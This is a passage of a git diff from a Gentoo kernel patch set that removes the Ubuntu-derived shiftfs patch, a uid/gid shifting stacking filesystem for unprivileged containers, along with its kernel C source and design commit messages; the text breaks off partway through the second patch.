diff options
-rw-r--r-- | 0000_README | 4 | ||||
-rw-r--r-- | 5000_shiftfs-6.2-2023-01-31.patch | 6607 |
2 files changed, 0 insertions, 6611 deletions
diff --git a/0000_README b/0000_README index b2b768d6..49d3a418 100644 --- a/0000_README +++ b/0000_README @@ -87,10 +87,6 @@ Patch: 4567_distro-Gentoo-Kconfig.patch From: Tom Wijsman <TomWij@gentoo.org> Desc: Add Gentoo Linux support config settings and defaults. -Patch: 5000_shiftfs-6.2-2023-01-31.patch -From: https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/unstable -Desc: Kernel module that provides a kernel filesystem for uid/gid shifting - Patch: 5010_enable-cpu-optimizations-universal.patch From: https://github.com/graysky2/kernel_compiler_patch Desc: Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs. diff --git a/5000_shiftfs-6.2-2023-01-31.patch b/5000_shiftfs-6.2-2023-01-31.patch deleted file mode 100644 index 44603abb..00000000 --- a/5000_shiftfs-6.2-2023-01-31.patch +++ /dev/null @@ -1,6607 +0,0 @@ -From b554e3101fdc94969141491a4234b3c931683b5c Mon Sep 17 00:00:00 2001 -From: James Bottomley <James.Bottomley@HansenPartnership.com> -Date: Thu, 4 Apr 2019 15:39:11 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: uid/gid shifting bind mount -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1823186 - -This allows any subtree to be uid/gid shifted and bound elsewhere. It -does this by operating simlarly to overlayfs. Its primary use is for -shifting the underlying uids of filesystems used to support -unpriviliged (uid shifted) containers. The usual use case here is -that the container is operating with an uid shifted unprivileged root -but sometimes needs to make use of or work with a filesystem image -that has root at real uid 0. - -The mechanism is to allow any subordinate mount namespace to mount a -shiftfs filesystem (by marking it FS_USERNS_MOUNT) but only allowing -it to mount marked subtrees (using the -o mark option as root). 
Once -mounted, the subtree is mapped via the super block user namespace so -that the interior ids of the mounting user namespace are the ids -written to the filesystem. - -Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com> -[ saf: use designated initializers for path declarations to fix errors - with struct randomization ] -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -[update: port to 5.0] -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/Kconfig | 8 + - fs/Makefile | 1 + - fs/shiftfs.c | 780 +++++++++++++++++++++++++++++++++++++ - include/uapi/linux/magic.h | 2 + - 4 files changed, 791 insertions(+) - create mode 100644 fs/shiftfs.c - -diff --git a/fs/Kconfig b/fs/Kconfig -index 2685a4d0d353..b53bece1e940 100644 ---- a/fs/Kconfig -+++ b/fs/Kconfig -@@ -128,6 +128,14 @@ source "fs/autofs/Kconfig" - source "fs/fuse/Kconfig" - source "fs/overlayfs/Kconfig" - -+config SHIFT_FS -+ tristate "UID/GID shifting overlay filesystem for containers" -+ help -+ This filesystem can overlay any mounted filesystem and shift -+ the uid/gid the files appear at. The idea is that -+ unprivileged containers can use this to mount root volumes -+ using this technique. 
-+ - menu "Caches" - - source "fs/netfs/Kconfig" -diff --git a/fs/Makefile b/fs/Makefile -index 4dea17840761..628632dcb9b1 100644 ---- a/fs/Makefile -+++ b/fs/Makefile -@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS) += efivarfs/ - obj-$(CONFIG_EROFS_FS) += erofs/ - obj-$(CONFIG_VBOXSF_FS) += vboxsf/ - obj-$(CONFIG_ZONEFS_FS) += zonefs/ -+obj-$(CONFIG_SHIFT_FS) += shiftfs.o -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -new file mode 100644 -index 000000000000..f7cada126daa ---- /dev/null -+++ b/fs/shiftfs.c -@@ -0,0 +1,780 @@ -+#include <linux/cred.h> -+#include <linux/mount.h> -+#include <linux/file.h> -+#include <linux/fs.h> -+#include <linux/namei.h> -+#include <linux/module.h> -+#include <linux/kernel.h> -+#include <linux/magic.h> -+#include <linux/parser.h> -+#include <linux/seq_file.h> -+#include <linux/statfs.h> -+#include <linux/slab.h> -+#include <linux/user_namespace.h> -+#include <linux/uidgid.h> -+#include <linux/xattr.h> -+ -+struct shiftfs_super_info { -+ struct vfsmount *mnt; -+ struct user_namespace *userns; -+ bool mark; -+}; -+ -+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode, -+ struct dentry *dentry); -+ -+enum { -+ OPT_MARK, -+ OPT_LAST, -+}; -+ -+/* global filesystem options */ -+static const match_table_t tokens = { -+ { OPT_MARK, "mark" }, -+ { OPT_LAST, NULL } -+}; -+ -+static const struct cred *shiftfs_get_up_creds(struct super_block *sb) -+{ -+ struct shiftfs_super_info *ssi = sb->s_fs_info; -+ struct cred *cred = prepare_creds(); -+ -+ if (!cred) -+ return NULL; -+ -+ cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid)); -+ cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid)); -+ put_user_ns(cred->user_ns); -+ cred->user_ns = get_user_ns(ssi->userns); -+ -+ return cred; -+} -+ -+static const struct cred *shiftfs_new_creds(const struct cred **newcred, -+ struct super_block *sb) -+{ -+ const struct cred *cred = shiftfs_get_up_creds(sb); -+ -+ *newcred = cred; -+ -+ if (cred) -+ cred = 
override_creds(cred); -+ else -+ printk(KERN_ERR "shiftfs: Credential override failed: no memory\n"); -+ -+ return cred; -+} -+ -+static void shiftfs_old_creds(const struct cred *oldcred, -+ const struct cred **newcred) -+{ -+ if (!*newcred) -+ return; -+ -+ revert_creds(oldcred); -+ put_cred(*newcred); -+} -+ -+static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options) -+{ -+ char *p; -+ substring_t args[MAX_OPT_ARGS]; -+ -+ ssi->mark = false; -+ -+ while ((p = strsep(&options, ",")) != NULL) { -+ int token; -+ -+ if (!*p) -+ continue; -+ -+ token = match_token(p, tokens, args); -+ switch (token) { -+ case OPT_MARK: -+ ssi->mark = true; -+ break; -+ default: -+ return -EINVAL; -+ } -+ } -+ return 0; -+} -+ -+static void shiftfs_d_release(struct dentry *dentry) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ -+ dput(real); -+} -+ -+static struct dentry *shiftfs_d_real(struct dentry *dentry, -+ const struct inode *inode) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ -+ if (unlikely(real->d_flags & DCACHE_OP_REAL)) -+ return real->d_op->d_real(real, real->d_inode); -+ -+ return real; -+} -+ -+static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ -+ if (d_unhashed(real)) -+ return 0; -+ -+ if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE)) -+ return 1; -+ -+ return real->d_op->d_weak_revalidate(real, flags); -+} -+ -+static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ int ret; -+ -+ if (d_unhashed(real)) -+ return 0; -+ -+ /* -+ * inode state of underlying changed from positive to negative -+ * or vice versa; force a lookup to update our view -+ */ -+ if (d_is_negative(real) != d_is_negative(dentry)) -+ return 0; -+ -+ if (!(real->d_flags & DCACHE_OP_REVALIDATE)) -+ return 1; -+ -+ ret = real->d_op->d_revalidate(real, flags); -+ -+ if (ret == 0 && !(flags & LOOKUP_RCU)) -+ d_invalidate(real); -+ 
-+ return ret; -+} -+ -+static const struct dentry_operations shiftfs_dentry_ops = { -+ .d_release = shiftfs_d_release, -+ .d_real = shiftfs_d_real, -+ .d_revalidate = shiftfs_d_revalidate, -+ .d_weak_revalidate = shiftfs_d_weak_revalidate, -+}; -+ -+static int shiftfs_readlink(struct dentry *dentry, char __user *data, -+ int flags) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ const struct inode_operations *iop = real->d_inode->i_op; -+ -+ if (iop->readlink) -+ return iop->readlink(real, data, flags); -+ -+ return -EINVAL; -+} -+ -+static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode, -+ struct delayed_call *done) -+{ -+ if (dentry) { -+ struct dentry *real = dentry->d_fsdata; -+ struct inode *reali = real->d_inode; -+ const struct inode_operations *iop = reali->i_op; -+ const char *res = ERR_PTR(-EPERM); -+ -+ if (iop->get_link) -+ res = iop->get_link(real, reali, done); -+ -+ return res; -+ } else { -+ /* RCU lookup not supported */ -+ return ERR_PTR(-ECHILD); -+ } -+} -+ -+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode, -+ const char *name, const void *value, -+ size_t size, int flags) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ int err = -EOPNOTSUPP; -+ const struct cred *oldcred, *newcred; -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ err = vfs_setxattr(real, name, value, size, flags); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ return err; -+} -+ -+static int shiftfs_xattr_get(const struct xattr_handler *handler, -+ struct dentry *dentry, struct inode *inode, -+ const char *name, void *value, size_t size) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ int err; -+ const struct cred *oldcred, *newcred; -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ err = vfs_getxattr(real, name, value, size); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ return err; -+} -+ -+static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list, -+ size_t size) -+{ -+ struct dentry 
*real = dentry->d_fsdata; -+ int err; -+ const struct cred *oldcred, *newcred; -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ err = vfs_listxattr(real, list, size); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ return err; -+} -+ -+static int shiftfs_removexattr(struct dentry *dentry, const char *name) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ int err; -+ const struct cred *oldcred, *newcred; -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ err = vfs_removexattr(real, name); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ return err; -+} -+ -+static int shiftfs_xattr_set(const struct xattr_handler *handler, -+ struct dentry *dentry, struct inode *inode, -+ const char *name, const void *value, size_t size, -+ int flags) -+{ -+ if (!value) -+ return shiftfs_removexattr(dentry, name); -+ return shiftfs_setxattr(dentry, inode, name, value, size, flags); -+} -+ -+static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry) -+{ -+ struct inode *reali; -+ -+ if (!dentry) -+ return; -+ -+ reali = dentry->d_inode; -+ -+ if (!reali->i_op->get_link) -+ inode->i_opflags |= IOP_NOFOLLOW; -+ -+ inode->i_mapping = reali->i_mapping; -+ inode->i_private = dentry; -+} -+ -+static int shiftfs_make_object(struct inode *dir, struct dentry *dentry, -+ umode_t mode, const char *symlink, -+ struct dentry *hardlink, bool excl) -+{ -+ struct dentry *real = dir->i_private, *new = dentry->d_fsdata; -+ struct inode *reali = real->d_inode, *newi; -+ const struct inode_operations *iop = reali->i_op; -+ int err; -+ const struct cred *oldcred, *newcred; -+ bool op_ok = false; -+ -+ if (hardlink) { -+ op_ok = iop->link; -+ } else { -+ switch (mode & S_IFMT) { -+ case S_IFDIR: -+ op_ok = iop->mkdir; -+ break; -+ case S_IFREG: -+ op_ok = iop->create; -+ break; -+ case S_IFLNK: -+ op_ok = iop->symlink; -+ } -+ } -+ if (!op_ok) -+ return -EINVAL; -+ -+ -+ newi = shiftfs_new_inode(dentry->d_sb, mode, NULL); -+ if (!newi) -+ return -ENOMEM; -+ -+ oldcred 
= shiftfs_new_creds(&newcred, dentry->d_sb); -+ -+ inode_lock_nested(reali, I_MUTEX_PARENT); -+ -+ err = -EINVAL; /* shut gcc up about uninit var */ -+ if (hardlink) { -+ struct dentry *realhardlink = hardlink->d_fsdata; -+ -+ err = vfs_link(realhardlink, reali, new, NULL); -+ } else { -+ switch (mode & S_IFMT) { -+ case S_IFDIR: -+ err = vfs_mkdir(reali, new, mode); -+ break; -+ case S_IFREG: -+ err = vfs_create(reali, new, mode, excl); -+ break; -+ case S_IFLNK: -+ err = vfs_symlink(reali, new, symlink); -+ } -+ } -+ -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ if (err) -+ goto out_dput; -+ -+ shiftfs_fill_inode(newi, new); -+ -+ d_instantiate(dentry, newi); -+ -+ new = NULL; -+ newi = NULL; -+ -+ out_dput: -+ dput(new); -+ iput(newi); -+ inode_unlock(reali); -+ -+ return err; -+} -+ -+static int shiftfs_create(struct inode *dir, struct dentry *dentry, -+ umode_t mode, bool excl) -+{ -+ mode |= S_IFREG; -+ -+ return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl); -+} -+ -+static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry, -+ umode_t mode) -+{ -+ mode |= S_IFDIR; -+ -+ return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false); -+} -+ -+static int shiftfs_link(struct dentry *hardlink, struct inode *dir, -+ struct dentry *dentry) -+{ -+ return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false); -+} -+ -+static int shiftfs_symlink(struct inode *dir, struct dentry *dentry, -+ const char *symlink) -+{ -+ return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false); -+} -+ -+static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) -+{ -+ struct dentry *real = dir->i_private, *new = dentry->d_fsdata; -+ struct inode *reali = real->d_inode; -+ int err; -+ const struct cred *oldcred, *newcred; -+ -+ inode_lock_nested(reali, I_MUTEX_PARENT); -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ -+ if (rmdir) -+ err = vfs_rmdir(reali, new); -+ else -+ err = vfs_unlink(reali, new, NULL); -+ -+ 
shiftfs_old_creds(oldcred, &newcred); -+ inode_unlock(reali); -+ -+ return err; -+} -+ -+static int shiftfs_unlink(struct inode *dir, struct dentry *dentry) -+{ -+ return shiftfs_rm(dir, dentry, false); -+} -+ -+static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry) -+{ -+ return shiftfs_rm(dir, dentry, true); -+} -+ -+static int shiftfs_rename(struct inode *olddir, struct dentry *old, -+ struct inode *newdir, struct dentry *new, -+ unsigned int flags) -+{ -+ struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private, -+ *realold = old->d_fsdata, -+ *realnew = new->d_fsdata, *trap; -+ struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode; -+ int err = -EINVAL; -+ const struct cred *oldcred, *newcred; -+ -+ trap = lock_rename(rndd, rodd); -+ -+ if (trap == realold || trap == realnew) -+ goto out_unlock; -+ -+ oldcred = shiftfs_new_creds(&newcred, old->d_sb); -+ -+ err = vfs_rename(realolddir, realold, realnewdir, -+ realnew, NULL, flags); -+ -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ out_unlock: -+ unlock_rename(rndd, rodd); -+ -+ return err; -+} -+ -+static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry, -+ unsigned int flags) -+{ -+ struct dentry *real = dir->i_private, *new; -+ struct inode *reali = real->d_inode, *newi; -+ const struct cred *oldcred, *newcred; -+ -+ inode_lock(reali); -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len); -+ shiftfs_old_creds(oldcred, &newcred); -+ inode_unlock(reali); -+ -+ if (IS_ERR(new)) -+ return new; -+ -+ dentry->d_fsdata = new; -+ -+ newi = NULL; -+ if (!new->d_inode) -+ goto out; -+ -+ newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new); -+ if (!newi) { -+ dput(new); -+ return ERR_PTR(-ENOMEM); -+ } -+ -+ out: -+ return d_splice_alias(newi, dentry); -+} -+ -+static int shiftfs_permission(struct inode *inode, int mask) -+{ -+ struct dentry *real = inode->i_private; -+ 
struct inode *reali = real->d_inode; -+ const struct inode_operations *iop = reali->i_op; -+ int err; -+ const struct cred *oldcred, *newcred; -+ -+ if (mask & MAY_NOT_BLOCK) -+ return -ECHILD; -+ -+ oldcred = shiftfs_new_creds(&newcred, inode->i_sb); -+ if (iop->permission) -+ err = iop->permission(reali, mask); -+ else -+ err = generic_permission(reali, mask); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ return err; -+} -+ -+static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) -+{ -+ struct dentry *real = dentry->d_fsdata; -+ struct inode *reali = real->d_inode; -+ const struct inode_operations *iop = reali->i_op; -+ struct iattr newattr = *attr; -+ const struct cred *oldcred, *newcred; -+ struct super_block *sb = dentry->d_sb; -+ int err; -+ -+ newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid)); -+ newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid)); -+ -+ oldcred = shiftfs_new_creds(&newcred, dentry->d_sb); -+ inode_lock(reali); -+ if (iop->setattr) -+ err = iop->setattr(real, &newattr); -+ else -+ err = simple_setattr(real, &newattr); -+ inode_unlock(reali); -+ shiftfs_old_creds(oldcred, &newcred); -+ -+ if (err) -+ return err; -+ -+ /* all OK, reflect the change on our inode */ -+ setattr_copy(d_inode(dentry), attr); -+ return 0; -+} -+ -+static int shiftfs_getattr(const struct path *path, struct kstat *stat, -+ u32 request_mask, unsigned int query_flags) -+{ -+ struct inode *inode = path->dentry->d_inode; -+ struct dentry *real = path->dentry->d_fsdata; -+ struct inode *reali = real->d_inode; -+ const struct inode_operations *iop = reali->i_op; -+ struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real }; -+ int err = 0; -+ -+ if (iop->getattr) -+ err = iop->getattr(&newpath, stat, request_mask, query_flags); -+ else -+ generic_fillattr(reali, stat); -+ -+ if (err) -+ return err; -+ -+ /* transform the underlying id */ -+ stat->uid = make_kuid(inode->i_sb->s_user_ns, 
__kuid_val(stat->uid)); -+ stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid)); -+ return 0; -+} -+ -+static const struct inode_operations shiftfs_inode_ops = { -+ .lookup = shiftfs_lookup, -+ .getattr = shiftfs_getattr, -+ .setattr = shiftfs_setattr, -+ .permission = shiftfs_permission, -+ .mkdir = shiftfs_mkdir, -+ .symlink = shiftfs_symlink, -+ .get_link = shiftfs_get_link, -+ .readlink = shiftfs_readlink, -+ .unlink = shiftfs_unlink, -+ .rmdir = shiftfs_rmdir, -+ .rename = shiftfs_rename, -+ .link = shiftfs_link, -+ .create = shiftfs_create, -+ .mknod = NULL, /* no special files currently */ -+ .listxattr = shiftfs_listxattr, -+}; -+ -+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode, -+ struct dentry *dentry) -+{ -+ struct inode *inode; -+ -+ inode = new_inode(sb); -+ if (!inode) -+ return NULL; -+ -+ /* -+ * our inode is completely vestigial. All lookups, getattr -+ * and permission checks are done on the underlying inode, so -+ * what the user sees is entirely from the underlying inode. 
-+ */ -+ mode &= S_IFMT; -+ -+ inode->i_ino = get_next_ino(); -+ inode->i_mode = mode; -+ inode->i_flags |= S_NOATIME | S_NOCMTIME; -+ -+ inode->i_op = &shiftfs_inode_ops; -+ -+ shiftfs_fill_inode(inode, dentry); -+ -+ return inode; -+} -+ -+static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry) -+{ -+ struct super_block *sb = dentry->d_sb; -+ struct shiftfs_super_info *ssi = sb->s_fs_info; -+ -+ if (ssi->mark) -+ seq_show_option(m, "mark", NULL); -+ -+ return 0; -+} -+ -+static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf) -+{ -+ struct super_block *sb = dentry->d_sb; -+ struct shiftfs_super_info *ssi = sb->s_fs_info; -+ struct dentry *root = sb->s_root; -+ struct dentry *realroot = root->d_fsdata; -+ struct path realpath = { .mnt = ssi->mnt, .dentry = realroot }; -+ int err; -+ -+ err = vfs_statfs(&realpath, buf); -+ if (err) -+ return err; -+ -+ buf->f_type = sb->s_magic; -+ -+ return 0; -+} -+ -+static void shiftfs_put_super(struct super_block *sb) -+{ -+ struct shiftfs_super_info *ssi = sb->s_fs_info; -+ -+ mntput(ssi->mnt); -+ put_user_ns(ssi->userns); -+ kfree(ssi); -+} -+ -+static const struct xattr_handler shiftfs_xattr_handler = { -+ .prefix = "", -+ .get = shiftfs_xattr_get, -+ .set = shiftfs_xattr_set, -+}; -+ -+const struct xattr_handler *shiftfs_xattr_handlers[] = { -+ &shiftfs_xattr_handler, -+ NULL -+}; -+ -+static const struct super_operations shiftfs_super_ops = { -+ .put_super = shiftfs_put_super, -+ .show_options = shiftfs_show_options, -+ .statfs = shiftfs_statfs, -+}; -+ -+struct shiftfs_data { -+ void *data; -+ const char *path; -+}; -+ -+static int shiftfs_fill_super(struct super_block *sb, void *raw_data, -+ int silent) -+{ -+ struct shiftfs_data *data = raw_data; -+ char *name = kstrdup(data->path, GFP_KERNEL); -+ int err = -ENOMEM; -+ struct shiftfs_super_info *ssi = NULL; -+ struct path path; -+ struct dentry *dentry; -+ -+ if (!name) -+ goto out; -+ -+ ssi = kzalloc(sizeof(*ssi), GFP_KERNEL); -+ if 
(!ssi) -+ goto out; -+ -+ err = -EPERM; -+ err = shiftfs_parse_options(ssi, data->data); -+ if (err) -+ goto out; -+ -+ /* to mark a mount point, must be real root */ -+ if (ssi->mark && !capable(CAP_SYS_ADMIN)) -+ goto out; -+ -+ /* else to mount a mark, must be userns admin */ -+ if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN)) -+ goto out; -+ -+ err = kern_path(name, LOOKUP_FOLLOW, &path); -+ if (err) -+ goto out; -+ -+ err = -EPERM; -+ -+ if (!S_ISDIR(path.dentry->d_inode->i_mode)) { -+ err = -ENOTDIR; -+ goto out_put; -+ } -+ -+ sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1; -+ if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) { -+ printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n"); -+ err = -EINVAL; -+ goto out_put; -+ } -+ -+ if (ssi->mark) { -+ /* -+ * this part is visible unshifted, so make sure no -+ * executables that could be used to give suid -+ * privileges -+ */ -+ sb->s_iflags = SB_I_NOEXEC; -+ ssi->mnt = path.mnt; -+ dentry = path.dentry; -+ } else { -+ struct shiftfs_super_info *mp_ssi; -+ -+ /* -+ * this leg executes if we're admin capable in -+ * the namespace, so be very careful -+ */ -+ if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC) -+ goto out_put; -+ mp_ssi = path.dentry->d_sb->s_fs_info; -+ if (!mp_ssi->mark) -+ goto out_put; -+ ssi->mnt = mntget(mp_ssi->mnt); -+ dentry = dget(path.dentry->d_fsdata); -+ path_put(&path); -+ } -+ ssi->userns = get_user_ns(dentry->d_sb->s_user_ns); -+ sb->s_fs_info = ssi; -+ sb->s_magic = SHIFTFS_MAGIC; -+ sb->s_op = &shiftfs_super_ops; -+ sb->s_xattr = shiftfs_xattr_handlers; -+ sb->s_d_op = &shiftfs_dentry_ops; -+ sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry)); -+ sb->s_root->d_fsdata = dentry; -+ -+ return 0; -+ -+ out_put: -+ path_put(&path); -+ out: -+ kfree(name); -+ kfree(ssi); -+ return err; -+} -+ -+static struct dentry *shiftfs_mount(struct file_system_type *fs_type, -+ int flags, const char *dev_name, void *data) -+{ -+ struct shiftfs_data 
d = { data, dev_name }; -+ -+ return mount_nodev(fs_type, flags, &d, shiftfs_fill_super); -+} -+ -+static struct file_system_type shiftfs_type = { -+ .owner = THIS_MODULE, -+ .name = "shiftfs", -+ .mount = shiftfs_mount, -+ .kill_sb = kill_anon_super, -+ .fs_flags = FS_USERNS_MOUNT, -+}; -+ -+static int __init shiftfs_init(void) -+{ -+ return register_filesystem(&shiftfs_type); -+} -+ -+static void __exit shiftfs_exit(void) -+{ -+ unregister_filesystem(&shiftfs_type); -+} -+ -+MODULE_ALIAS_FS("shiftfs"); -+MODULE_AUTHOR("James Bottomley"); -+MODULE_DESCRIPTION("uid/gid shifting bind filesystem"); -+MODULE_LICENSE("GPL v2"); -+module_init(shiftfs_init) -+module_exit(shiftfs_exit) -diff --git a/include/uapi/linux/magic.h b/include/uapi/linux/magic.h -index 6325d1d0e90f..1f70efb41565 100644 ---- a/include/uapi/linux/magic.h -+++ b/include/uapi/linux/magic.h -@@ -102,4 +102,6 @@ - #define DEVMEM_MAGIC 0x454d444d /* "DMEM" */ - #define SECRETMEM_MAGIC 0x5345434d /* "SECM" */ - -+#define SHIFTFS_MAGIC 0x6a656a62 -+ - #endif /* __LINUX_MAGIC_H__ */ --- -2.39.2 - -From 7b502b7e97db8ec9deff14f434eed2f2fbc0cd2f Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Thu, 4 Apr 2019 15:39:12 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework and extend -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1823186 - -/* Introduction */ -The shiftfs filesystem is implemented as a stacking filesystem. Since it is -a stacking filesystem it shares concepts with overlayfs and ecryptfs. -Usually, shiftfs will be stacked upon another filesystem. The filesystem on -top - shiftfs - is referred to as "upper filesystem" or "overlay" and the -filesystem it is stacked upon is referred to as "lower filesystem" or -"underlay". - -/* Marked and Unmarked shiftfs mounts */ -To use shiftfs it is necessary that a given mount is marked as shiftable via -the "mark" mount option. 
Any mount of shiftfs without the "mark" mount option -not on top of a shiftfs mount with the "mark" mount option will be refused with -EPERM. -After a marked shiftfs mount has been performed other shiftfs mounts -referencing the marked shiftfs mount can be created. These secondary shiftfs -mounts are usually what are of interest. -The marked shiftfs mount will take a reference to the underlying mountpoint of -the directory it is marking as shiftable. Any unmarked shiftfts mounts -referencing this marked shifts mount will take a second reference to this -directory as well. This ensures that the underlying marked shiftfs mount can be -unmounted thereby dropping the reference to the underlying directory without -invalidating the mountpoint of said directory since the non-marked shiftfs -mount still holds another reference to it. - -/* Stacking Depth */ -Shiftfs tries to keep the stack as flat as possible to avoid hitting the -kernel enforced filesystem stacking limit. - -/* Permission Model */ -When the mark shiftfs mount is created shiftfs will record the credentials of -the creator of the super block and stash it in the super block. When other -non-mark shiftfs mounts are created that reference the mark shiftfs mount they -will stash another reference to the creators credentials. Before calling into -the underlying filesystem shiftfs will switch to the creators credentials and -revert to the original credentials after the underlying filesystem operation -returns. - -/* Mount Options */ -- mark - When set the mark mount option indicates that the mount in question is - allowed to be shifted. Since shiftfs it mountable in by user namespace root - non-initial user namespace this mount options ensures that the system - administrator has decided that the marked mount is safe to be shifted. - To mark a mount as shiftable CAP_SYS_ADMIN in the user namespace is required. -- passthrough={0,1,2,3} - This mount options functions as a bitmask. 
When set to a non-zero value - shiftfs will try to act as an invisible shim sitting on top of the - underlying filesystem. - - 1: Shifts will report the filesystem type of the underlay for stat-like - system calls. - - 2: Shiftfs will passthrough whitelisted ioctl() to the underlay. - - 3: Shiftfs will both use 1 and 2. -Note that mount options on a marked mount cannot be changed. - -/* Extended Attributes */ -Shiftfs will make sure to translate extended attributes. - -/* Inodes Numbers */ -Shiftfs inodes numbers are copied up from the underlying filesystem, i.e. -shiftfs inode numbers will be identical to the corresponding underlying -filesystem's inode numbers. This has the advantage that inotify and friends -should work out of the box. -(In essence, shiftfs is nothing but a 1:1 mirror of the underlying filesystem's - dentries and inodes.) - -/* Device Support */ -Shiftfs only supports the creation of pipe and socket devices. Character and -block devices cannot be created through shiftfs. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/Kconfig | 10 + - fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++---------- - 2 files changed, 1493 insertions(+), 369 deletions(-) - -diff --git a/fs/Kconfig b/fs/Kconfig -index b53bece1e940..ada9a1234e72 100644 ---- a/fs/Kconfig -+++ b/fs/Kconfig -@@ -136,6 +136,16 @@ config SHIFT_FS - unprivileged containers can use this to mount root volumes - using this technique. - -+config SHIFT_FS_POSIX_ACL -+ bool "shiftfs POSIX Access Control Lists" -+ depends on SHIFT_FS -+ select FS_POSIX_ACL -+ help -+ POSIX Access Control Lists (ACLs) support permissions for users and -+ groups beyond the owner/group/world scheme. -+ -+ If you don't know what Access Control Lists are, say N. 
-+ - menu "Caches" - - source "fs/netfs/Kconfig" -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index f7cada126daa..ad1ae5bce6c1 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1,3 +1,4 @@ -+#include <linux/capability.h> - #include <linux/cred.h> - #include <linux/mount.h> - #include <linux/file.h> -@@ -7,83 +8,179 @@ - #include <linux/kernel.h> - #include <linux/magic.h> - #include <linux/parser.h> -+#include <linux/security.h> - #include <linux/seq_file.h> - #include <linux/statfs.h> - #include <linux/slab.h> - #include <linux/user_namespace.h> - #include <linux/uidgid.h> - #include <linux/xattr.h> -+#include <linux/posix_acl.h> -+#include <linux/posix_acl_xattr.h> -+#include <linux/uio.h> - - struct shiftfs_super_info { - struct vfsmount *mnt; - struct user_namespace *userns; -+ /* creds of process who created the super block */ -+ const struct cred *creator_cred; - bool mark; -+ unsigned int passthrough; -+ struct shiftfs_super_info *info_mark; - }; - --static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode, -- struct dentry *dentry); -+struct shiftfs_file_info { -+ struct path realpath; -+ struct 